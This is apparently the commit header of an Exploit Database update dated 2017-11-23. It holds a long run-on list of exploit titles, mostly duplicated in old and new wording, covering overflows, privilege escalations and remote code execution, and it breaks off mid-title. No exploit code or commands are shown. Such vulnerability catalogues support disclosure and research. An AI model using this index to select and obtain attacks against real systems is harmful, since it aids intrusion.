From 6f71665f8a5043cda97cc65e9dca24a11cd8020a Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Thu, 23 Nov 2017 05:02:28 +0000
Subject: [PATCH] DB: 2017-11-23

28 new exploits

Apache 2.0.45 - 'APR' Crash IPD (Integrity Protection Driver) - Denial of Service Ubuntu 6.06 DHCPd - Remote Denial of Service Ubuntu 6.06 - DHCPd Remote Denial of Service Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC) CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC) Adobe Reader - Escape From '.PDF' Oracle Solaris - 'su' Crash SunOS 4.1.3 - kmem setgid /etc/crash Solaris 2.5.1 - 'Ping' System Panic (Denial of Service) Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options Linux Kernel 2.0/2.1/2.2 - 'autofs' Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / SuSE Linux 6.1) - IP Options Linux Kernel 2.0/2.1/2.2 - 'autofs' Denial of Service S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service SuSE Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' (Denial of Service) Adobe Flash - Use-After-Free in Drawing Methods 'this' Adobe Flash - Drawing Methods 'this' Use-After-Free Symantec AntiVirus - Integer Overflow in TNEF Decoder Symantec AntiVirus - TNEF Decoder Integer Overflow Apple iOS/macOS - NSKeyedArchiver Heap Corruption Due to Rounding Error in 'TIKeyboardLayout initWithCoder:' Apple iOS/macOS - NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking in 'CAMediaTimingFunctionBuiltin' Apple iOS/macOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error Apple iOS/macOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking Microsoft Edge Chakra - Incorrect Usage of 'PushPopFrameHelper' in 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Microsoft Edge Chakra - Incorrect Usage of 'TryUndeleteProperty'
Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service) Microsoft Edge Chakra - 'TryUndeleteProperty' Incorrect Usage (Denial of Service) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' (Denial of Service) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' (Denial of Service) Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval' Microsoft Edge Chakra - 'Parser::ParseCatch' Does Not Handle 'eval()' (Denial of Service) Microsoft Edge Chakra - Accesses to Uninitialized Pointers in 'StackScriptFunction::BoxState::Box' Microsoft Edge Chakra - 'StackScriptFunction::BoxState::Box' Accesses to Uninitialized Pointers (Denial of Service) Xen - Unbounded Recursion in Pagetable De-typing Xen - Pagetable De-typing Unbounded Recursion Vonage VDV-23 - Denial of Service WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free WebKit - 'WebCore::InputType::element' Use-After-Free WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free 
WebKit - 'WebCore::FormSubmission::create' Use-After-Free IBM DB2 - Universal Database 7.2 'db2licm' Local IBM DB2 - Universal Database 7.2 'db2licm' Local Overflow OpenBSD - 'ibcs2_exec' Kernel Local OpenBSD - 'ibcs2_exec' Kernel Code Execution SuSE Linux 9.0 - YaST Configuration Skribt Local SuSE Linux 9.0 - YaST Configuration Skribt Overwrite Files BSDi 3.0/4.0 - rcvtty[mh] Local BSDi 3.0/4.0 - 'rcvtty[mh]' Privilege Escalation Solaris locale - Format Strings 'noexec stack' Solaris 2.6/7.0 - 'locale' Format Strings noexec stack Overflow RedHat 6.1 man - 'egid 15' Local RedHat 6.1 - 'man' Local Overflow / Privilege Escalation splitvt < 1.6.5 - Local splitvt < 1.6.5 - Overflow IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Privilege Escalation Slackware 7.1 - '/usr/bin/mail' Local Slackware 7.1 - '/usr/bin/mail' Privilege Escalation GLIBC 2.1.3 - LD_PRELOAD Local GLIBC 2.1.3 - 'LD_PRELOAD' Privilege Escalation Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Resolv+ (RESOLV_HOST_CONF) - Linux Library Command Execution LibXt - 'XtAppInitialize()' Overflow *xterm LibXt - 'XtAppInitialize()' Local Overflow *xterm ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Overflow AOL Instant Messenger AIM - 'Away' Message Local OpenBSD - 'ftp' ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow AOL Instant Messenger AIM - 'Away' Message Local Overflow OpenBSD - 'ftp' Local Overflow IPD (Integrity Protection Driver) - Local XV 3.x - '.BMP' Parsing Local Buffer Overflow htpasswd Apache 1.3.31 - Local htpasswd Apache 1.3.31 - Overflow GlobalScape - CuteFTP macros '.mcr' Local BSD bmon 1.2.1_2 - Local GlobalScape - CuteFTP macros '.mcr' Local File Write BSD bmon 1.2.1_2 - Local acls Bypass Microsoft Windows - Improper Token Validation Local Microsoft Windows - 
Improper Token Validation Privilege Escalation Apple iTunes - Playlist Parsing Local Buffer Overflow Setuid perl - 'PerlIO_Debug()' Overflow Setuid perl - 'PerlIO_Debug()' Local Overflow DelphiTurk e-Posta 1.0 - Local GNU a2ps - 'Anything to PostScript' Not SUID Local DelphiTurk e-Posta 1.0 - Credential Recover GNU a2ps - Anything to PostScript Not SUID Local Overflow GetDataBack Data Recovery 2.31 - Local GetDataBack Data Recovery 2.31 - Licence Recover Exim 4.41 - 'dns_build_reverse' Local Exim 4.41 - 'dns_build_reverse' Local Read Emails Willing Webcam 2.8 - Licence Information Disclosure Local Willing Webcam 2.8 - Licence Information Disclosure Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow TIBCO Rendezvous 7.4.11 - Password Extractor Local TIBCO Rendezvous 7.4.11 - Password Extractor Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation XMPlay 3.3.0.4 - '.PLS' Local Buffer Overflow Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Apache 1.3.33/1.3.34 (Ubuntu / Debian) - CGI TTY Privilege Escalation Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Privilege Escalation Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Overflow PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP) Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP) Oracle 10g R1 - 'pitrig_drop' PLSQL Injection 'get users hash' Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection 'get users hash' Oracle 10g R1 - 'pitrig_drop' Get Users Hash / PL/SQL Injection Oracle 10g R1 - 'PITRIG_TRUNCATE' Get Users Hash / PL/SQL Injection Debian XTERM - 'DECRQSS/comments' Debian 
XTERM - 'DECRQSS/comments' Code Execution BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow HyperVM - File Permissions Local HyperVM - File Permissions Credential Disclosure Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Remote Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Overflow VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow Adobe Reader - Escape From '.PDF' Execute Embedded Executable Free MP3 CD Ripper 2.6 - '.wav' Free MP3 CD Ripper 2.6 - '.wav' Local Overflow GSM SIM Utility 5.15 - Direct RET Local GSM SIM Utility 5.15 - Direct RET Overflow Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow Oracle Solaris - 'su' Local Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution Viscom VideoEdit Gold ActiveX 8.0 - Code Execution Digital Music Pad 8.2.3.4.8 - '.pls' Overflow (SEH) Digital Music Pad 8.2.3.4.8 - '.pls' Local Overflow (SEH) Adobe Flash Player - 'Button' Remote Code Execution (Metasploit) Adobe Flash Player - 'Button' Arbitrary Code Execution (Metasploit) MPlayer Lite r33064 - '.m3u' Overflow (SEH) MPlayer Lite r33064 - '.m3u' Local Overflow (SEH) ACDSee FotoSlate - '.PLP' File 'id' Overflow (Metasploit) ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit) Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Overflow Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Local Overflow SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Overflow / Privilege Escalation Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation Microsoft Windows - 'April Fools 2001' Microsoft Windows - 'April Fools 2001' Set Incorrect Date Solaris 2.5.1 - 'Ping' BSD/OS 2.1 / 
DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Overflow / Privilege Escalation (1) BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1) Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password' Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (3) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3) Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages Solaris 7.0 - 'chkperm' Solaris 7.0 - 'chkperm' Privilege Escalation S.u.S.E. Linux 5.2 - 'gnuplot' S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation S.u.S.E. 
5.2 - 'lpc' Privilege Escalation S.u.S.E Linux 5.2 - 'lpc' Privilege Escalation NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File SGI IRIX 6.0.1 - 'colorview' SGI IRIX 6.0.1 - 'colorview' Read Files SGI IRIX 6.2 - 'day5notifier' SGI IRIX 6.2 - 'day5notifier' Privilege Escalation SGI IRIX 6.4 - 'datman'/'cdman' SGI IRIX 6.4 - 'datman'/'cdman' Privilege Escalation SGI IRIX 6.4 - 'login' SGI IRIX 6.4 - 'login' Privilege Escalation SGI IRIX 6.4 - 'rmail' SGI IRIX 6.4 - 'rmail' Privilege Escalation SGI IRIX 5.1/5.2 - 'sgihelp' SGI IRIX 5.1/5.2 - 'sgihelp' Privilege Escalation Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (2) RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1) RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2) RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (1) RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (2) Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Privilege Escalation S.u.S.E. Linux 6.2 sscw - HOME Environment Variable Buffer Overflow SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow S.u.S.E. 
Linux 6.1/6.2 - 'cwdtools' SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation Solaris 7.0 - 'kcms_configure' Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation FreeBSD 3.3 - Seyon setgid Dialer FreeBSD 3.3 - Seyon SetGID Dialer SGI IRIX 6.2 - 'midikeys'/'soundplayer' SGI IRIX 6.2 - 'midikeys'/'soundplayer' Privilege Escalation Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Microsoft Windows 95/98/NT 4.0 - 'autorun.inf' Code Execution FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Privilege Escalation Corel Linux OS 1.0 - 'setxconf' Corel Linux OS 1.0 - 'setxconf' Privilege Escalation Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Halloween Linux 4.0 / SuSE Linux 6.0/6.1/6.2/6.3 - 'kreatecd' Privilege Escalation S.u.S.E. Linux 6.x - Arbitrary File Deletion SuSE Linux 6.x - Arbitrary File Deletion S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow SuSE Linux 6.3/6.4 Gnomelib - Buffer Overflow RedHat Linux 6.0/6.1/6.2 - 'pam_console' RedHat Linux 6.0/6.1/6.2 - 'pam_console' Monitor Activity After Logout S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1) S.u.S.E. 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2) S.u.S.E. 
4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3) S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (1) S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (2) S.u.S.E Linux 4.x/5.x/6.x/7.0 / Slackware 3.x/4.0 / Turbolinux 6 / OpenLinux 7.0 - 'fdmount' Buffer Overflow (3) CVSWeb Developer CVSWeb 1.80 - Insecure perl 'open' CVSWeb Developer CVSWeb 1.80 - Insecure Perl 'open' Code Execution Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Netscape iCal 2.1 Patch2 - iPlanet iCal 'csstart' Privilege Escalation Debian 2.2 / S.u.S.E 6.3/6.4/7.0 - man '-l' Format String Debian 2.2 / Su.S.E 6.3/6.4/7.0 - man '-l' Format String Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / SuSE Linux 6.x/7.0/7.1 - 'Man -S' Heap Overflow S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String S.u.S.E 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Shell Definition Format String SuSE Linux 6.4/7.0/7.1/7.2 Berkeley Parallel Make - Buffer Overflow SCO OpenServer 5.0.x - 'mana' REMOTE_ADDR Authentication Bypass SCO OpenServer 5.0.x - 'mana' 'REMOTE_ADDR' Authentication Bypass Samhain Labs 1.x - HSFTP Remote Format String Inmatrix Ltd. Zoom Player 8.5 - '.jpeg' Inmatrix Ltd. 
Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution LiquidXML Studio 2010 - ActiveX Remote LiquidXML Studio 2010 - ActiveX Code Execution HexChat 2.9.4 - Local HexChat 2.9.4 - Overflow Winamp 5.63 - 'winamp.ini' Local Winamp 5.63 - 'winamp.ini' Local Overflow Apple 2.0.4 - Safari Local Apple 2.0.4 - Safari Local Cross-Site Scripting Gold MP4 Player - '.swf' Local Gold MP4 Player - '.swf' Local Overflow Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation Linux Kernel - 'offset2lib Stack Clash' Linux Kernel - 'offset2lib' Stack Clash Microsoft IIS - WebDAV 'ntdll.dll' Remote Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow Microsoft Windows 2000/XP - SMB Authentication Remote Microsoft Windows 2000/XP - SMB Authentication Remote Overflow Apache 2.0.45 - 'APR' Remote Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow Microsoft Windows Media Services - 'nsiislog.dll' Remote Microsoft Windows Media Services - 'nsiislog.dll' Remote Overflow Citadel/UX BBS 6.07 - Remote Citadel/UX BBS 6.07 - Remote Overflow NIPrint LPD-LPR Print Server 4.10 - Remote NIPrint LPD-LPR Print Server 4.10 - Remote Overflow IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow INND/NNRP < 1.6.x - Overflow INND/NNRP < 1.6.x - Remote Overflow OpenBSD ftpd 2.6/2.7 - Remote OpenBSD ftpd 2.6/2.7 - Remote Overflow IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote IMAP4rev1 12.261/12.264/2000.284 - 'lsub' 
Remote Overflow Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Overflow OpenFTPd 0.30.2 - Remote OpenFTPd 0.30.2 - Remote Overflow WU-IMAP 2000.287(1-2) - Remote WU-IMAP 2000.287(1-2) - Remote Overflow XV 3.x - '.BMP' Parsing Local Buffer Overflow PHP 4.3.7/5.0.0RC3 - memory_limit Remote PHP 4.3.7/5.0.0RC3 - 'memory_limit' Remote Overflow SHOUTcast DNAS/Linux 1.9.4 - Format String Remote SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow Apple iTunes - Playlist Parsing Local Buffer Overflow 3CServer 1.1 (FTP Server) - Remote 3CServer 1.1 (FTP Server) - Remote Overflow SHOUTcast 1.9.4 (Windows) - File Request Format String Remote SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow LimeWire 4.1.2 < 4.5.6 - 'GET' Remote LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow MailEnable Enterprise 1.x - IMAPd Remote MailEnable Enterprise 1.x - IMAPd Remote Overflow Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Microsoft Internet Explorer - 'javaprxy.dll' COM Object Remote Overflow HP OpenView OmniBack II - Generic Remote HP OpenView OmniBack II - Generic Remote Command Execution CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Overflow CA BrightStor ARCserve Backup - Overflow CA BrightStor ARCserve Backup - Remote Overflow HP OpenView Network Node Manager 7.50 - Remote DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote HP OpenView Network Node Manager 7.50 - Remote Command Execution DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Overflow Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution Veritas 
NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution Mercury Mail Transport System 4.01b - PH SERVER Remote Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote File System Access XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow Microsoft DNS Server - Dynamic DNS Updates Remote Microsoft DNS Server - Dynamic DNS Update/Change Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Easy File Sharing FTP Server 2.0 (Windows 2000 SP4) - 'PASS' Remote Overflow IBM Lotus Domino Server 6.5 - Unauthenticated Remote IBM Lotus Domino Server 6.5 - Unauthenticated Remote Overflow Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow IBM Tivoli Provisioning Manager - Unauthenticated Remote IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter) HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' File Write Apache Tomcat Connector mod_jk - 'exec-shield' Remote Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Remote NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution Lighttpd 1.4.16 - FastCGI Header Overflow Remote Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution Lighttpd 1.4.17 - FastCGI Header Overflow Remote Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution SonicWALL 
SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution Move Networks Quantum Streaming Player - Overflow (SEH) Move Networks Quantum Streaming Player - Remote Overflow (SEH) Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2) Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download Sun Solaris 10 - snoop(1M) Utility Remote Sun Solaris 10 - snoop(1M) Utility Remote Command Execution NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution Autodesk DWF Viewer Control / LiveUpdate Module - Remote Autodesk DWF Viewer Control / LiveUpdate Module - Remote Code Execution Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Linux Kernel 2.6.20/2.6.24/2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Overflow Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Microsoft Office Web Components Spreadsheet - ActiveX 'OWC10/11' Remote Overflow EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC) CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC) Samba 2.2.x - 'nttrans' Overflow (Metasploit) Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) Unreal Tournament 2004 - 'Secure' Overflow (Metasploit) Unreal Tournament 2004 - 'Secure' Remote Overflow (Metasploit) BigAnt Server 2.52 - Overflow (SEH) BigAnt Server 2.52 - Remote Overflow (SEH) NetTransport Download Manager 2.90.510 - Overflow (SEH) NetTransport Download Manager 2.90.510 - Remote 
Overflow (SEH) (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote (Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Remote Overflow Xftp client 3.0 - 'PWD' Remote Xftp client 3.0 - 'PWD' Remote Overflow File Sharing Wizard 1.5.0 - Overflow (SEH) File Sharing Wizard 1.5.0 - Remote Overflow (SEH) Sun Java Web Server 7.0 u7 - Remote Sun Java Web Server 7.0 u7 - Remote Overflow Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow Sun Java Web Server 7.0 u7 - Overflow (DEP Bypass) Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass) SopCast 3.2.9 - Remote SopCast 3.2.9 - Remote Command Execution Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Trend Micro Internet Security 2010 - 'UfPBCtrl.DLL' ActiveX Remote Command Exeuction Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 